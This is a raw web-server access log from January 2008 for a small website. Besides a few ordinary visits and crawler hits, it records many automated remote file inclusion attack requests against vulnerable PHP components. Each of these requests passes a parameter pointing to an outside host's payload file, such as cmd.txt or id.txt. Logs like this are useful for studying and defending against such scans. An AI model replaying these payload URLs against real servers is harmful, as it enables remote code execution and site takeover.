85.17.3.183 - - [12/Jan/2008:16:36:06 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 294 "-" "libwww-perl/5.79" "www.projectpr.com"
85.17.3.183 - - [12/Jan/2008:16:36:07 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
64.79.214.81 - - [12/Jan/2008:16:37:11 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.projectpr.com"
64.79.214.81 - - [12/Jan/2008:16:37:11 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.projectpr.com"
208.53.147.60 - - [12/Jan/2008:16:37:56 -0800] "GET /logs/index.php?pagina=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.projectpr.com"
208.53.147.60 - - [12/Jan/2008:16:37:56 -0800] "GET /index.php?pagina=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.projectpr.com"
203.189.224.2 - - [12/Jan/2008:16:41:30 -0800] "GET /logs/access_070812.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://dragoc.bravehost.com/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
203.189.224.2 - - [12/Jan/2008:16:41:30 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://dragoc.bravehost.com/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
203.189.224.2 - - [12/Jan/2008:16:41:31 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://dragoc.bravehost.com/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
80.97.20.22 - - [12/Jan/2008:16:42:57 -0800] "GET /logs/access_070812.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://dragoc.bravehost.com/id.txt? HTTP/1.1" 404 337 "-" "libwww-perl/5.803" "www.projectpr.com"
80.97.20.22 - - [12/Jan/2008:16:42:57 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://dragoc.bravehost.com/id.txt? HTTP/1.1" 404 314 "-" "libwww-perl/5.803" "www.projectpr.com"
80.97.20.22 - - [12/Jan/2008:16:42:58 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://dragoc.bravehost.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
71.166.100.251 - - [12/Jan/2008:16:50:25 -0800] "GET / HTTP/1.1" 200 9521 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.projectpr.com"
71.166.100.251 - - [12/Jan/2008:16:50:25 -0800] "GET /clipart/pageHeaders/greenLeafBridge.gif HTTP/1.1" 200 47456 "http://www.projectpr.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.projectpr.com"
71.166.100.251 - - [12/Jan/2008:16:50:26 -0800] "GET /clipart/lines/horizontal/darkgreen_gradient.gif HTTP/1.1" 200 709 "http://www.projectpr.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.projectpr.com"
71.166.100.251 - - [12/Jan/2008:16:50:26 -0800] "GET /clipart/images/sidebars/leafLeft.gif HTTP/1.1" 200 33964 "http://www.projectpr.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.projectpr.com"
71.166.100.251 - - [12/Jan/2008:16:50:27 -0800] "GET /sitebuilder/images/navbar-0-active-65203.png HTTP/1.1" 200 250 "http://www.projectpr.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.projectpr.com"
71.166.100.251 - - [12/Jan/2008:16:50:27 -0800] "GET /sitebuilder/images/navbar-1-inactive-65328.png HTTP/1.1" 200 273 "http://www.projectpr.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.projectpr.com"
71.166.100.251 - - [12/Jan/2008:16:50:27 -0800] "GET /sitebuilder/images/navbar-2-inactive-65484.png HTTP/1.1" 200 303 "http://www.projectpr.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.projectpr.com"
71.166.100.251 - - [12/Jan/2008:16:50:27 -0800] "GET /sitebuilder/images/navbar-3-inactive-65640.png HTTP/1.1" 200 298 "http://www.projectpr.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.projectpr.com"
71.166.100.251 - - [12/Jan/2008:16:50:27 -0800] "GET /images/promo_mail.gif HTTP/1.1" 200 1469 "http://www.projectpr.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.projectpr.com"
151.1.141.17 - - [12/Jan/2008:16:51:26 -0800] "GET /logs/access_%3Cwbr%20/%3E070812.log//components/com_smf/smf.php?mosConfig_absolute_path=http://rmk.se/bilder/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
151.1.141.17 - - [12/Jan/2008:16:51:27 -0800] "GET //components/com_smf/smf.php?mosConfig_absolute_path=http://rmk.se/bilder/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
151.1.141.17 - - [12/Jan/2008:16:51:28 -0800] "GET /logs/access_%3Cwbr%20//components/com_smf/smf.php?mosConfig_absolute_path=http://rmk.se/bilder/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
89.96.224.38 - - [12/Jan/2008:16:51:40 -0800] "GET /logs/access_%3Cwbr%20/%3E070812.log//components/com_smf/smf.php?mosConfig_absolute_path=http://charitygrants.org/images/djd.txt??? HTTP/1.1" 404 309 "-" "libwww-perl/5.805" "www.projectpr.com"
89.96.224.38 - - [12/Jan/2008:16:51:40 -0800] "GET /logs/access_%3Cwbr%20/%3E070812.log//components/com_smf/smf.php?mosConfig_absolute_path=http://charitygrants.org/images/djd.txt??? HTTP/1.1" 404 309 "-" "libwww-perl/5.805" "www.projectpr.com"
89.96.224.38 - - [12/Jan/2008:16:51:41 -0800] "GET //components/com_smf/smf.php?mosConfig_absolute_path=http://charitygrants.org/images/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
89.96.224.38 - - [12/Jan/2008:16:51:41 -0800] "GET //components/com_smf/smf.php?mosConfig_absolute_path=http://charitygrants.org/images/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
89.96.224.38 - - [12/Jan/2008:16:51:41 -0800] "GET /logs/access_%3Cwbr%20//components/com_smf/smf.php?mosConfig_absolute_path=http://charitygrants.org/images/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
89.96.224.38 - - [12/Jan/2008:16:51:41 -0800] "GET /logs/access_%3Cwbr%20//components/com_smf/smf.php?mosConfig_absolute_path=http://charitygrants.org/images/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
85.12.50.119 - - [12/Jan/2008:16:51:51 -0800] "GET /logs/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 289 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.projectpr.com"
85.12.50.119 - - [12/Jan/2008:16:51:51 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.projectpr.com"
89.96.224.38 - - [12/Jan/2008:16:53:14 -0800] "GET /logs/access_%3Cwbr%20/%3E070712.log//components/com_smf/smf.php?mosConfig_absolute_path=http://charitygrants.org/images/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
89.96.224.38 - - [12/Jan/2008:16:53:19 -0800] "GET /logs/access_%3Cwbr%20/%3E070712.log//components/com_smf/smf.php?mosConfig_absolute_path=http://charitygrants.org/images/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
151.1.141.17 - - [12/Jan/2008:16:53:39 -0800] "GET /logs/access_%3Cwbr%20/%3E070712.log//components/com_smf/smf.php?mosConfig_absolute_path=http://rmk.se/bilder/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
64.79.214.81 - - [12/Jan/2008:16:54:17 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.projectpr.com"
64.79.214.81 - - [12/Jan/2008:16:54:20 -0800] "GET /logs/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.projectpr.com"
85.12.50.119 - - [12/Jan/2008:16:57:08 -0800] "GET //modules/xfsection/modify.php?dir_module=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.projectpr.com"
85.12.50.119 - - [12/Jan/2008:16:57:08 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.projectpr.com"
64.79.214.81 - - [12/Jan/2008:16:58:27 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.projectpr.com"
64.79.214.81 - - [12/Jan/2008:16:58:29 -0800] "GET //modules/xfsection/modify.php?dir_module=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.projectpr.com"
205.234.252.183 - - [12/Jan/2008:16:59:49 -0800] "GET //components/com_smf/smf.php?mosConfig_absolute_path=http://charitygrants.org/images/cmd.txt? HTTP/1.1" 404 273 "-" "libwww-perl/5.808" "www.projectpr.com"
66.98.152.83 - - [12/Jan/2008:17:01:49 -0800] "GET //components/com_smf/smf.php?mosConfig_absolute_path=http://charitygrants.org/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.projectpr.com"
209.172.32.108 - - [12/Jan/2008:17:02:17 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
208.53.147.60 - - [12/Jan/2008:17:03:15 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.projectpr.com"
208.53.147.60 - - [12/Jan/2008:17:03:29 -0800] "GET /logs/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.projectpr.com"
83.16.96.219 - - [12/Jan/2008:17:05:31 -0800] "GET /logs/access.log/modules/xfsection/modify.php?dir_module=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 290 "-" "libwww-perl/5.805" "www.projectpr.com"
83.16.96.219 - - [12/Jan/2008:17:05:37 -0800] "GET /modules/xfsection/modify.php?dir_module=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
83.16.96.219 - - [12/Jan/2008:17:05:43 -0800] "GET /logs/modules/xfsection/modify.php?dir_module=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 279 "-" "libwww-perl/5.805" "www.projectpr.com"
205.234.252.183 - - [12/Jan/2008:17:09:25 -0800] "GET /logs/access.log//components/com_smf/smf.php?mosConfig_absolute_path=http://charitygrants.org/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
205.234.252.183 - - [12/Jan/2008:17:09:25 -0800] "GET /logs//components/com_smf/smf.php?mosConfig_absolute_path=http://charitygrants.org/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
86.39.131.85 - - [12/Jan/2008:17:09:30 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.projectpr.com"
86.39.131.85 - - [12/Jan/2008:17:09:30 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.projectpr.com"
66.98.152.83 - - [12/Jan/2008:17:10:26 -0800] "GET /logs/access.log//components/com_smf/smf.php?mosConfig_absolute_path=http://charitygrants.org/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.projectpr.com"
66.98.152.83 - - [12/Jan/2008:17:10:26 -0800] "GET /logs//components/com_smf/smf.php?mosConfig_absolute_path=http://charitygrants.org/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.projectpr.com"
200.55.216.70 - - [12/Jan/2008:17:13:04 -0800] "GET /logs/access_070912.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
216.40.231.114 - - [12/Jan/2008:17:16:33 -0800] "GET /logs/index.php?content=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.projectpr.com"
216.40.231.114 - - [12/Jan/2008:17:16:33 -0800] "GET /index.php?content=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.projectpr.com"
209.172.32.108 - - [12/Jan/2008:17:17:12 -0800] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
209.172.32.108 - - [12/Jan/2008:17:17:13 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
66.98.228.61 - - [12/Jan/2008:17:17:20 -0800] "GET /index.php?option=frontpage&Itemid=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.projectpr.com"
66.98.228.61 - - [12/Jan/2008:17:17:21 -0800] "GET /logs/index.php?option=frontpage&Itemid=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.projectpr.com"
64.38.24.138 - - [12/Jan/2008:17:19:48 -0800] "GET /logs/access_070812.log/index.php?link=http://apm.hk/content/strings.txt?? HTTP/1.1" 404 278 "-" "libwww-perl/5.808" "www.projectpr.com"
64.38.24.138 - - [12/Jan/2008:17:19:48 -0800] "GET /index.php?link=http://apm.hk/content/strings.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
64.38.24.138 - - [12/Jan/2008:17:19:48 -0800] "GET /logs/index.php?link=http://apm.hk/content/strings.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
201.232.85.19 - - [12/Jan/2008:17:22:09 -0800] "GET /logs/access.log/claroline/inc/claro_init_header.inc.php?includePath=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
201.232.85.19 - - [12/Jan/2008:17:22:12 -0800] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
74.6.8.120 - - [12/Jan/2008:17:24:19 -0800] "GET /logs/access_070812.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
66.249.70.107 - - [12/Jan/2008:17:31:35 -0800] "GET /clipart/images/sidebars/?M=A HTTP/1.1" 200 715 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
209.172.32.108 - - [12/Jan/2008:17:31:35 -0800] "GET /logs/access_070712.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
69.10.135.176 - - [12/Jan/2008:17:33:22 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
69.10.135.176 - - [12/Jan/2008:17:33:27 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://eagles-tailgate.com/gallery/albums/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
66.180.175.37 - - [12/Jan/2008:17:45:57 -0800] "GET /index.php?option=frontpage&Itemid=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.projectpr.com"
66.180.175.37 - - [12/Jan/2008:17:45:58 -0800] "GET /logs/index.php?option=frontpage&Itemid=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.projectpr.com"
213.115.110.142 - - [12/Jan/2008:17:51:41 -0800] "GET /cutenews/show_archives.php?cutepath=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.projectpr.com"
213.115.110.142 - - [12/Jan/2008:17:51:41 -0800] "GET /logs/cutenews/show_archives.php?cutepath=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.projectpr.com"
69.10.135.176 - - [12/Jan/2008:17:53:14 -0800] "GET /logs/access_070812.log//modules/vwar/admin/admin.php?vwar_root=? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
69.10.135.176 - - [12/Jan/2008:17:53:14 -0800] "GET /logs/access_070812.log//modules/vwar/admin/admin.php?vwar_root=http://eagles-tailgate.com/gallery/albums/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
69.10.135.176 - - [12/Jan/2008:17:53:14 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
69.10.135.176 - - [12/Jan/2008:17:53:14 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://eagles-tailgate.com/gallery/albums/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
66.7.209.233 - - [12/Jan/2008:17:55:38 -0800] "GET /index.php?option=frontpage&Itemid=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.projectpr.com"
66.7.209.233 - - [12/Jan/2008:17:55:39 -0800] "GET /logs/index.php?option=frontpage&Itemid=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.projectpr.com"
209.172.32.108 - - [12/Jan/2008:17:57:05 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
209.172.32.108 - - [12/Jan/2008:18:14:09 -0800] "GET /logs/access.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
209.172.32.108 - - [12/Jan/2008:18:14:09 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
207.182.253.124 - - [12/Jan/2008:18:25:29 -0800] "GET /logs/index.php?content=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.projectpr.com"
207.182.253.124 - - [12/Jan/2008:18:25:29 -0800] "GET /index.php?content=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.projectpr.com"
201.232.85.19 - - [12/Jan/2008:18:41:12 -0800] "GET //components/com_smf/smf.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 273 "-" "libwww-perl/5.805" "www.projectpr.com"
201.232.85.19 - - [12/Jan/2008:18:41:16 -0800] "GET /logs//components/com_smf/smf.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
74.6.19.123 - - [12/Jan/2008:18:42:21 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
74.6.25.205 - - [12/Jan/2008:18:42:21 -0800] "GET /sitebuilder/ HTTP/1.0" 200 655 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
201.232.85.19 - - [12/Jan/2008:18:48:08 -0800] "GET /logs/access_070712.log//components/com_smf/smf.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
74.6.8.120 - - [12/Jan/2008:18:54:31 -0800] "GET /aboutus.html HTTP/1.0" 200 13748 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
200.21.98.67 - - [12/Jan/2008:19:03:58 -0800] "GET /newspublish/include.php?path[docroot]=http://www.tus-dom-esch.de/templates/l?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
87.25.213.172 - - [12/Jan/2008:19:11:53 -0800] "GET /logs//includes/tumbnail.php?config[root_ordner]=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.projectpr.com"
87.25.213.172 - - [12/Jan/2008:19:11:57 -0800] "GET //includes/tumbnail.php?config[root_ordner]=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.projectpr.com"
85.119.217.23 - - [12/Jan/2008:19:12:17 -0800] "GET /logs/access_070812.log//modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://dutchstockingpage.com/spread.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
85.119.217.23 - - [12/Jan/2008:19:12:18 -0800] "GET //modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://dutchstockingpage.com/spread.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
85.119.217.23 - - [12/Jan/2008:19:12:18 -0800] "GET /logs//modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://dutchstockingpage.com/spread.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
201.232.85.19 - - [12/Jan/2008:19:13:22 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
74.6.20.204 - - [12/Jan/2008:19:14:04 -0800] "GET /clipart/?N=D HTTP/1.0" 200 1197 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
81.21.69.107 - - [12/Jan/2008:19:25:02 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://boringtime.com/banget??? HTTP/1.1" 404 273 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.projectpr.com"
